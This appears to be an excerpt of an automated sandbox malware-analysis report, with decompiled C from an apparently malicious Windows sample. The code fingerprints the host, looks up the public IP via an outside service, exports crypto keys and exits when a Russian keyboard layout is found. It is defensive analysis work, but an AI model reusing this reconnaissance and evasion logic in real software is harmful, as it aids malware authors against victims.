                                    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F586486
                                    • CryptDestroyKey.ADVAPI32(?), ref: 0F586490
                                    • CryptReleaseContext.ADVAPI32(0F584B9E,00000000), ref: 0F58649C
                                    • CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F5864B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                    • API String ID: 137402220-1948191093
                                    • Opcode ID: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
                                    • Instruction ID: 77e3b4d4d798aa6039f0574d410643d6e18703d3481dd7951f0722d0fd54af85
                                    • Opcode Fuzzy Hash: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
                                    • Instruction Fuzzy Hash: A9214475780305FBEB20EBA0DE89F9E3B79B748B11F504414F701BB1C0D6B9A915A761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E0F582F50(WCHAR* __ecx) {
                                    				unsigned int _v8;
                                    				char _v12;
                                    				WCHAR* _v16;
                                    				short _v2064;
                                    				long _t17;
                                    				void* _t18;
                                    				void* _t20;
                                    				WCHAR* _t23;
                                    				int _t25;
                                    				void* _t28;
                                    				unsigned int _t31;
                                    				void* _t35;
                                    				intOrPtr* _t39;
                                    				signed int _t40;
                                    
                                    				_t39 = __imp__EnumDeviceDrivers;
                                    				_v16 = __ecx;
                                    				_v8 = 0;
                                    				 *_t39( &_v12, 4,  &_v8); // executed
                                    				_t17 = _v8;
                                    				if(_t17 != 0) {
                                    					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                    					_t35 = _t18;
                                    					if(_t35 != 0) {
                                    						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
                                    						if(_t20 == 0) {
                                    							L10:
                                    							VirtualFree(_t35, 0, 0x8000); // executed
                                    							return 0;
                                    						} else {
                                    							_t40 = 0;
                                    							_t31 = _v8 >> 2;
                                    							if(_t31 > 0) {
                                    								do {
                                    									_t23 =  &_v2064;
                                    									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
                                    									if(_t23 == 0) {
                                    										goto L9;
                                    									} else {
                                    										_t25 = lstrcmpiW( &_v2064, _v16); // executed
                                    										if(_t25 == 0) {
                                    											VirtualFree(_t35, 0, 0x8000);
                                    											return 1;
                                    										} else {
                                    											goto L9;
                                    										}
                                    									}
                                    									goto L12;
                                    									L9:
                                    									_t40 = _t40 + 1;
                                    								} while (_t40 < _t31);
                                    							}
                                    							goto L10;
                                    						}
                                    					} else {
                                    						return _t18;
                                    					}
                                    				} else {
                                    					return _t17;
                                    				}
                                    				L12:
                                    			}

















                                    0x0f582f5a
                                    0x0f582f69
                                    0x0f582f6d
                                    0x0f582f74
                                    0x0f582f76
                                    0x0f582f7b
                                    0x0f582f8d
                                    0x0f582f93
                                    0x0f582f97
                                    0x0f582fa8
                                    0x0f582fac
                                    0x0f582ff2
                                    0x0f582ffa
                                    0x0f583008
                                    0x0f582fae
                                    0x0f582fb1
                                    0x0f582fb3
                                    0x0f582fb8
                                    0x0f582fc0
                                    0x0f582fc5
                                    0x0f582fcf
                                    0x0f582fd7
                                    0x00000000
                                    0x0f582fd9
                                    0x0f582fe3
                                    0x0f582feb
                                    0x0f583011
                                    0x0f583022
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f582feb
                                    0x00000000
                                    0x0f582fed
                                    0x0f582fed
                                    0x0f582fee
                                    0x0f582fc0
                                    0x00000000
                                    0x0f582fb8
                                    0x0f582f99
                                    0x0f582f9e
                                    0x0f582f9e
                                    0x0f582f81
                                    0x0f582f81
                                    0x0f582f81
                                    0x00000000

                                    APIs
                                    • K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F582F8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocDeviceDriversEnumVirtual
                                    • String ID: i)w
                                    • API String ID: 4140748134-1280834553
                                    • Opcode ID: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
                                    • Instruction ID: b5be798d32ed43a2c8bd127696d2c4888455d0adb587606371de88e77df44b43
                                    • Opcode Fuzzy Hash: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
                                    • Instruction Fuzzy Hash: FB21AA32A04219BBEB109E98AD85FE97BBCFB44711F1041A7FE04F6180DB75A9179B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D
                                    • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F58700F
                                    • lstrlenW.KERNEL32(0F58FF8C), ref: 0F58701C
                                      • Part of subcall function 0F588050: InternetCloseHandle.WININET(?), ref: 0F588063
                                      • Part of subcall function 0F588050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082
                                    • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F58704B
                                    • wsprintfW.USER32 ref: 0F587063
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F587079
                                    • InternetCloseHandle.WININET(?), ref: 0F587087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                    • String ID: GET$ipv4bot.whatismyipaddress.com
                                    • API String ID: 4289327240-2259699238
                                    • Opcode ID: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
                                    • Instruction ID: 0cc39304379ec535d5ec06b0a30b34a82d2ee5a76a94162813642de8c3bf72e4
                                    • Opcode Fuzzy Hash: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
                                    • Instruction Fuzzy Hash: F5019235740204BBD6207A75AD4EF9B3F68BB89B62F100035FA05F1181DB68952BD6A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 f587490-f5874a7 1 f5874a9-f5874c8 VirtualAlloc GetUserNameW 0->1 2 f5874ce-f5874d2 0->2 1->2 3 f5874d4-f5874f0 VirtualAlloc GetComputerNameW 2->3 4 f5874f6-f587500 2->4 3->4 5 f587502-f587517 VirtualAlloc 4->5 6 f587556-f58755a 4->6 5->6 7 f587519-f58752f call f587410 5->7 8 f587560-f58759a VirtualAlloc RegOpenKeyExW 6->8 9 f5875f5-f5875f9 6->9 18 f587534-f587536 7->18 13 f58759c-f5875be RegQueryValueExW 8->13 14 f5875de-f5875ef VirtualFree 8->14 10 f5876f9-f5876fd 9->10 11 f5875ff-f58762d VirtualAlloc * 2 9->11 15 f58775b-f58775f 10->15 16 f5876ff-f587728 VirtualAlloc call f587410 10->16 17 f587634-f587667 wsprintfW RegOpenKeyExW 11->17 19 f5875c9 GetLastError 13->19 20 f5875c0-f5875c7 13->20 14->9 26 f5877ce-f5877d2 15->26 27 f587761-f587782 GetNativeSystemInfo VirtualAlloc 15->27 31 f58772d-f58772f 16->31 22 f587669-f587689 RegQueryValueExW 17->22 23 f5876c4-f5876c6 17->23 24 f587538-f58753f 18->24 25 f587549-f58754e 18->25 28 f5875cf-f5875dc RegCloseKey 19->28 20->28 32 f58768b-f587692 22->32 33 f587694 GetLastError 22->33 38 f5876c9-f5876cc 23->38 24->6 34 f587541-f587547 24->34 35 f587551-f587553 wsprintfW 25->35 29 f5877ef-f5877f3 26->29 30 f5877d4-f5877e3 call f587b70 26->30 36 f5877c3 27->36 37 f587784-f58778b 27->37 28->9 28->14 42 f587939 29->42 43 f5877f9-f587887 VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW call f587410 29->43 52 f5877e8-f5877ea 30->52 31->15 40 f587731-f587758 call f587410 wsprintfW 31->40 41 f58769a-f5876a7 RegCloseKey 32->41 33->41 34->35 35->6 51 f5877c8-f5877cb wsprintfW 36->51 37->36 44 f5877bc-f5877c1 37->44 45 f5877ae-f5877b3 37->45 46 f587792-f5877a1 wsprintfW ExitProcess 37->46 47 f5877b5-f5877ba 37->47 48 f5877a7-f5877ac 37->48 49 f5876ce-f5876d0 38->49 50 f5876d6-f5876f3 wsprintfW VirtualFree 38->50 40->15 41->23 53 f5876a9-f5876b9 41->53 55 f58793f-f587943 42->55 65 f587889-f5878b5 lstrlenW call f587410 43->65 66 f5878ba-f5878fb wsprintfW lstrcatW GetModuleHandleW GetProcAddress 43->66 44->51 45->51 47->51 48->51 49->17 49->50 50->10 51->26 52->29 59 f5877ec 52->59 53->46 71 f5876bf-f5876c2 53->71 57 f587949-f587999 VirtualAlloc 55->57 58 f587af2-f587af9 55->58 67 f5879a0-f5879ab 57->67 62 f587afb-f587b17 VirtualAlloc 58->62 63 f587b40-f587b4b 58->63 59->29 68 f587b19-f587b22 call f586ff0 62->68 69 f587b36 62->69 65->66 73 f587919 66->73 74 f5878fd-f587917 lstrlenW 66->74 67->67 70 f5879ad-f5879bf 67->70 68->63 83 f587b24-f587b30 VirtualFree 68->83 69->63 77 f5879c2-f5879da GetDriveTypeW 70->77 71->38 76 f587920-f587937 VirtualFree 73->76 74->76 76->55 79 f587acd 77->79 80 f5879e0-f5879e3 77->80 82 f587ad3-f587add 79->82 80->79 84 f5879e9-f587a30 lstrcatW * 3 GetDiskFreeSpaceW 80->84 82->77 85 f587ae3-f587aed lstrlenW 82->85 83->69 86 f587ac3-f587acb lstrcatW 84->86 87 f587a36-f587ac1 call f588ab0 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 84->87 85->58 86->79 87->82
                                    C-Code - Quality: 88%
                                    			E0F587490(DWORD* __ecx, void* __edx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				long _v16;
                                    				long _v20;
                                    				int _v24;
                                    				int _v28;
                                    				intOrPtr _v32;
                                    				short _v36;
                                    				short _v40;
                                    				WCHAR* _v44;
                                    				WCHAR* _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				WCHAR* _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				signed short _v76;
                                    				char _v132;
                                    				void* _t154;
                                    				long _t155;
                                    				WCHAR* _t157;
                                    				short _t158;
                                    				short _t159;
                                    				short _t160;
                                    				signed int _t161;
                                    				signed int _t164;
                                    				signed int _t166;
                                    				int _t178;
                                    				void* _t181;
                                    				signed int _t183;
                                    				signed int _t186;
                                    				WCHAR* _t190;
                                    				void* _t191;
                                    				void* _t199;
                                    				_Unknown_base(*)()* _t204;
                                    				signed int _t211;
                                    				intOrPtr _t216;
                                    				WCHAR* _t218;
                                    				WCHAR* _t220;
                                    				void* _t221;
                                    				void* _t224;
                                    				WCHAR* _t226;
                                    				long _t229;
                                    				int _t230;
                                    				long _t234;
                                    				void* _t238;
                                    				long _t240;
                                    				long _t243;
                                    				WCHAR* _t246;
                                    				void* _t247;
                                    				WCHAR* _t249;
                                    				WCHAR* _t250;
                                    				WCHAR* _t252;
                                    				void* _t256;
                                    				DWORD* _t260;
                                    				short* _t261;
                                    				DWORD* _t266;
                                    				void* _t267;
                                    				signed int _t270;
                                    				void* _t274;
                                    				void* _t276;
                                    				void* _t277;
                                    				DWORD* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    
                                    				_t267 = __edx;
                                    				_t260 = __ecx;
                                    				_t279 = __ecx;
                                    				if( *__ecx != 0) {
                                    					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
                                    					_t260 =  &_v24;
                                    					 *(_t279 + 8) = _t252;
                                    					_v24 = 0x100;
                                    					GetUserNameW(_t252, _t260); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
                                    					_v24 = 0x1e;
                                    					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
                                    					_t260 =  &_v24;
                                    					 *(_t279 + 0x14) = _t250;
                                    					GetComputerNameW(_t250, _t260);
                                    				}
                                    				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
                                    					L11:
                                    					if( *(_t279 + 0x30) == 0) {
                                    						L18:
                                    						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
                                    							L31:
                                    							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
                                    								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
                                    								_push(_t260);
                                    								 *(_t279 + 0x50) = _t220;
                                    								_t221 = E0F587410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
                                    								if(_t221 == 0) {
                                    									_push(_t260);
                                    									E0F587410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
                                    									wsprintfW( *(_t279 + 0x50), L"error");
                                    									_t281 = _t281 + 8;
                                    								}
                                    							}
                                    							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
                                    								L44:
                                    								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
                                    									_v28 = 0;
                                    									_t216 = E0F587B70(_t279 + 0x2c,  &_v28); // executed
                                    									if(_t216 == 0) {
                                    										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
                                    									}
                                    								}
                                    								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
                                    									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    									 *(_t279 + 0x68) = _t190;
                                    									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                    									_t276 = _t191;
                                    									GetWindowsDirectoryW(_t276, 0x100);
                                    									_t66 = _t276 + 0x600; // 0x600
                                    									_t266 = _t66;
                                    									 *((short*)(_t276 + 6)) = 0;
                                    									_t68 = _t276 + 0x400; // 0x400
                                    									_t69 = _t276 + 0x604; // 0x604
                                    									_t70 = _t276 + 0x608; // 0x608
                                    									_t71 = _t276 + 0x200; // 0x200
                                    									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
                                    									_push(_t266);
                                    									_t72 = _t276 + 0x60c; // 0x60c
                                    									_t260 = _t72;
                                    									_t199 = E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
                                    									if(_t199 != 0) {
                                    										_t73 = _t276 + 0x60c; // 0x60c
                                    										_t211 = lstrlenW(_t73);
                                    										_t74 = _t276 + 0x60c; // 0x60c
                                    										_t260 = _t74;
                                    										_push(_t260);
                                    										E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
                                    									}
                                    									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
                                    									_t79 = _t276 + 0x60c; // 0x60c
                                    									_t281 = _t281 + 0xc;
                                    									lstrcatW( *(_t279 + 0x68), _t79);
                                    									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                    									_v28 = _t204;
                                    									if(_t204 == 0) {
                                    										 *(_t279 + 0x6c) = 0;
                                    									} else {
                                    										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
                                    									}
                                    									 *(_t279 + 0x70) =  *(_t276 + 0x600);
                                    									VirtualFree(_t276, 0, 0x8000); // executed
                                    								}
                                    								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
                                    									L67:
                                    									if( *(_t279 + 0x80) == 0) {
                                    										L72:
                                    										return 1;
                                    									}
                                    									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
                                    									 *(_t279 + 0x84) = _t154;
                                    									if(_t154 == 0) {
                                    										L71:
                                    										 *(_t279 + 0x80) = 0;
                                    										goto L72;
                                    									}
                                    									_push(_t260);
                                    									_t155 = E0F586FF0(_t154); // executed
                                    									if(_t155 != 0) {
                                    										goto L72;
                                    									}
                                    									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
                                    									goto L71;
                                    								} else {
                                    									_v68 = L"UNKNOWN";
                                    									_v64 = L"NO_ROOT_DIR";
                                    									_v60 = L"REMOVABLE";
                                    									_v56 = L"FIXED";
                                    									_v52 = L"REMOTE";
                                    									_v48 = L"CDROM";
                                    									_v44 = L"RAMDISK";
                                    									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    									 *(_t279 + 0x7c) = _t157;
                                    									_t261 =  &_v132;
                                    									_t158 = 0x41;
                                    									do {
                                    										 *_t261 = _t158;
                                    										_t261 = _t261 + 2;
                                    										_t158 = _t158 + 1;
                                    									} while (_t158 <= 0x5a);
                                    									_t159 =  *L"?:\\"; // 0x3a003f
                                    									_v40 = _t159;
                                    									_t160 =  *0xf58f350; // 0x5c
                                    									_v36 = _t160;
                                    									_t161 = 0;
                                    									_v24 = 0;
                                    									do {
                                    										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
                                    										_t164 = GetDriveTypeW( &_v40); // executed
                                    										_t270 = _t164;
                                    										if(_t270 > 2 && _t270 != 5) {
                                    											_v36 = 0;
                                    											lstrcatW( *(_t279 + 0x7c),  &_v40);
                                    											_v36 = 0x5c;
                                    											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
                                    											lstrcatW( *(_t279 + 0x7c), "_");
                                    											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
                                    											if(_t178 == 0) {
                                    												lstrcatW( *(_t279 + 0x7c), L"0,");
                                    												goto L64;
                                    											}
                                    											_v8 = E0F588AB0(_v16, 0, _v28 * _v20, 0);
                                    											_t256 = _t267;
                                    											_t181 = E0F588AB0(_v12, 0, _v28 * _v20, 0);
                                    											_t274 = _v8;
                                    											_v32 = _t274 - _t181;
                                    											asm("sbb eax, edx");
                                    											_v8 = _t256;
                                    											_t183 = lstrlenW( *(_t279 + 0x7c));
                                    											_push(_t256);
                                    											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
                                    											_t186 = lstrlenW( *(_t279 + 0x7c));
                                    											_push(_v8);
                                    											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
                                    											_t281 = _t281 + 0x20;
                                    											lstrcatW( *(_t279 + 0x7c), ",");
                                    										}
                                    										_t161 = _v24 + 1;
                                    										_v24 = _t161;
                                    									} while (_t161 < 0x1b);
                                    									_t166 = lstrlenW( *(_t279 + 0x7c));
                                    									_t260 =  *(_t279 + 0x7c);
                                    									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
                                    									goto L67;
                                    								}
                                    							} else {
                                    								__imp__GetNativeSystemInfo( &_v76); // executed
                                    								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
                                    								_t260 = _v76 & 0x0000ffff;
                                    								 *(_t279 + 0x5c) = _t218;
                                    								if(_t260 > 9) {
                                    									L42:
                                    									_push(L"Unknown");
                                    									L43:
                                    									wsprintfW(_t218, ??);
                                    									_t281 = _t281 + 8;
                                    									goto L44;
                                    								}
                                    								_t260 =  *(_t260 + E0F587B60) & 0x000000ff;
                                    								switch( *((intOrPtr*)(_t260 * 4 +  &M0F587B4C))) {
                                    									case 0:
                                    										_push(L"x86");
                                    										goto L43;
                                    									case 1:
                                    										_push(L"ARM");
                                    										goto L43;
                                    									case 2:
                                    										_push(L"Itanium");
                                    										goto L43;
                                    									case 3:
                                    										_push(L"x64");
                                    										goto L43;
                                    									case 4:
                                    										goto L42;
                                    								}
                                    							}
                                    						}
                                    						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
                                    						_v8 = _t224;
                                    						_v20 = _t224 + 0xe;
                                    						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                    						 *(_t279 + 0x44) = _t226;
                                    						_t277 = 1;
                                    						_v24 = 1;
                                    						do {
                                    							wsprintfW(_v8, L"%d", _t277);
                                    							_t281 = _t281 + 0xc;
                                    							_v16 = 0;
                                    							_t277 = _t277 + 1;
                                    							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
                                    							if(_t229 != 0) {
                                    								L27:
                                    								_t230 = 0;
                                    								_v24 = 0;
                                    								goto L28;
                                    							}
                                    							_v28 = 0x80;
                                    							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
                                    							if(_t234 != 0) {
                                    								GetLastError();
                                    							} else {
                                    								_v16 = 1;
                                    							}
                                    							RegCloseKey(_v12); // executed
                                    							if(_v16 == 0) {
                                    								goto L27;
                                    							} else {
                                    								if(lstrcmpiW(_v20, L"00000419") == 0) {
                                    									_t218 = wsprintfW( *(_t279 + 0x44), "1");
                                    									_t281 = _t281 + 8;
                                    									ExitProcess(0);
                                    								}
                                    								_t230 = _v24;
                                    							}
                                    							L28:
                                    						} while (_t277 != 9 && _t230 != 0);
                                    						wsprintfW( *(_t279 + 0x44), "0");
                                    						_t281 = _t281 + 8;
                                    						VirtualFree(_v8, 0, 0x8000); // executed
                                    						goto L31;
                                    					}
                                    					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                    					_v20 = _t238;
                                    					 *(_t279 + 0x38) = _t238;
                                    					_v12 = 0;
                                    					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
                                    					if(_t240 != 0) {
                                    						L17:
                                    						 *(_t279 + 0x30) = 0;
                                    						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
                                    						goto L18;
                                    					}
                                    					_v24 = 0x40;
                                    					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
                                    					if(_t243 != 0) {
                                    						GetLastError();
                                    					} else {
                                    						_v12 = 1;
                                    					}
                                    					RegCloseKey(_v8); // executed
                                    					if(_v12 != 0) {
                                    						goto L18;
                                    					} else {
                                    						goto L17;
                                    					}
                                    				} else {
                                    					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                    					 *(_t279 + 0x20) = _t246;
                                    					if(_t246 == 0) {
                                    						goto L11;
                                    					}
                                    					_push(_t260);
                                    					_t247 = E0F587410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
                                    					if(_t247 == 0) {
                                    						wsprintfW( *(_t279 + 0x20), L"undefined");
                                    						L10:
                                    						_t281 = _t281 + 8;
                                    						goto L11;
                                    					}
                                    					_t249 =  *(_t279 + 0x20);
                                    					if( *_t249 != 0) {
                                    						goto L11;
                                    					}
                                    					wsprintfW(_t249, L"WORKGROUP");
                                    					goto L10;
                                    				}
                                    			}




































































                                    0x0f587490
                                    0x0f587490
                                    0x0f58749b
                                    0x0f5874a7
                                    0x0f5874b7
                                    0x0f5874b9
                                    0x0f5874bc
                                    0x0f5874c1
                                    0x0f5874c8
                                    0x0f5874c8
                                    0x0f5874d2
                                    0x0f5874df
                                    0x0f5874e6
                                    0x0f5874e8
                                    0x0f5874eb
                                    0x0f5874f0
                                    0x0f5874f0
                                    0x0f587500
                                    0x0f587556
                                    0x0f58755a
                                    0x0f5875f5
                                    0x0f5875f9
                                    0x0f5876f9
                                    0x0f5876fd
                                    0x0f58770d
                                    0x0f58770f
                                    0x0f587725
                                    0x0f587728
                                    0x0f58772f
                                    0x0f587731
                                    0x0f587749
                                    0x0f587756
                                    0x0f587758
                                    0x0f587758
                                    0x0f58772f
                                    0x0f58775f
                                    0x0f5877ce
                                    0x0f5877d2
                                    0x0f5877d7
                                    0x0f5877e3
                                    0x0f5877ea
                                    0x0f5877ec
                                    0x0f5877ec
                                    0x0f5877ea
                                    0x0f5877f3
                                    0x0f587807
                                    0x0f587817
                                    0x0f58781a
                                    0x0f58781c
                                    0x0f587824
                                    0x0f58782c
                                    0x0f58782c
                                    0x0f587837
                                    0x0f58783b
                                    0x0f587842
                                    0x0f587849
                                    0x0f587856
                                    0x0f58785e
                                    0x0f587864
                                    0x0f58786a
                                    0x0f58786a
                                    0x0f587880
                                    0x0f587887
                                    0x0f587889
                                    0x0f587890
                                    0x0f587896
                                    0x0f587896
                                    0x0f58789c
                                    0x0f5878b5
                                    0x0f5878b5
                                    0x0f5878c8
                                    0x0f5878d0
                                    0x0f5878d6
                                    0x0f5878dd
                                    0x0f5878f0
                                    0x0f5878f6
                                    0x0f5878fb
                                    0x0f587919
                                    0x0f5878fd
                                    0x0f587914
                                    0x0f587914
                                    0x0f58792e
                                    0x0f587931
                                    0x0f587931
                                    0x0f587943
                                    0x0f587af2
                                    0x0f587af9
                                    0x0f587b42
                                    0x0f587b4b
                                    0x0f587b4b
                                    0x0f587b09
                                    0x0f587b0f
                                    0x0f587b17
                                    0x0f587b36
                                    0x0f587b36
                                    0x00000000
                                    0x0f587b36
                                    0x0f587b19
                                    0x0f587b1b
                                    0x0f587b22
                                    0x00000000
                                    0x00000000
                                    0x0f587b30
                                    0x00000000
                                    0x0f587949
                                    0x0f587957
                                    0x0f58795e
                                    0x0f587965
                                    0x0f58796c
                                    0x0f587973
                                    0x0f58797a
                                    0x0f587981
                                    0x0f587988
                                    0x0f58798e
                                    0x0f587991
                                    0x0f587994
                                    0x0f5879a0
                                    0x0f5879a0
                                    0x0f5879a3
                                    0x0f5879a6
                                    0x0f5879a7
                                    0x0f5879ad
                                    0x0f5879b2
                                    0x0f5879b5
                                    0x0f5879ba
                                    0x0f5879bd
                                    0x0f5879bf
                                    0x0f5879c2
                                    0x0f5879c7
                                    0x0f5879cf
                                    0x0f5879d5
                                    0x0f5879da
                                    0x0f5879eb
                                    0x0f5879f6
                                    0x0f587a04
                                    0x0f587a08
                                    0x0f587a12
                                    0x0f587a28
                                    0x0f587a30
                                    0x0f587acb
                                    0x00000000
                                    0x0f587acb
                                    0x0f587a52
                                    0x0f587a55
                                    0x0f587a57
                                    0x0f587a5c
                                    0x0f587a68
                                    0x0f587a6b
                                    0x0f587a6d
                                    0x0f587a70
                                    0x0f587a79
                                    0x0f587a8a
                                    0x0f587a98
                                    0x0f587a9a
                                    0x0f587aac
                                    0x0f587ab4
                                    0x0f587abf
                                    0x0f587abf
                                    0x0f587ad6
                                    0x0f587ad7
                                    0x0f587ada
                                    0x0f587ae6
                                    0x0f587ae8
                                    0x0f587aed
                                    0x00000000
                                    0x0f587aed
                                    0x0f587761
                                    0x0f587765
                                    0x0f587776
                                    0x0f587778
                                    0x0f58777c
                                    0x0f587782
                                    0x0f5877c3
                                    0x0f5877c3
                                    0x0f5877c8
                                    0x0f5877c9
                                    0x0f5877cb
                                    0x00000000
                                    0x0f5877cb
                                    0x0f587784
                                    0x0f58778b
                                    0x00000000
                                    0x0f5877bc
                                    0x00000000
                                    0x00000000
                                    0x0f5877ae
                                    0x00000000
                                    0x00000000
                                    0x0f5877b5
